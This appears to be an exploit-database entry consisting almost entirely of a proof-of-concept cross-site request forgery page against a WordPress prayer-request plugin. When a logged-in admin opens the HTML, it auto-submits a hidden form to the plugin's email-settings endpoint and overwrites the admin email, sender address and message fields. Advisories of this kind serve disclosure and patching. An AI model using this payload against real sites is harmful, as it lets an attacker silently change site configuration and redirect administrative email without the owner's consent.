Share
## https://sploitus.com/exploit?id=WPEX-ID:C1E5DEE9-C540-4CC1-8B94-C6D1650B52D3
Have an admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/edit.php?post_type=prayers&page=pray-email-settings" method="post" enctype="multipart/form-data">
<input type="hidden" name="prayer_req_admin_email" value="csrf" />
<input type="hidden" name="prayer_admin_email_cc" value="csrf" />
<input type="hidden" name="prayer_email_from" value="csrf" />
<input type="hidden" name="prayer_email_user" value="csrf" />
<input type="hidden" name="prayer_email_req_subject" value="csrf" />
<input type="hidden" name="prayer_email_req_messages" value="csrf" />
<input type="hidden" name="prayer_email_admin_subject" value="csrf" />
<input type="hidden" name="prayer_email_admin_messages" value="csrf" />
<input type="hidden" name="emailsettings" value="Update" />
<input type="submit" value="submit" />
</form>
</body>
```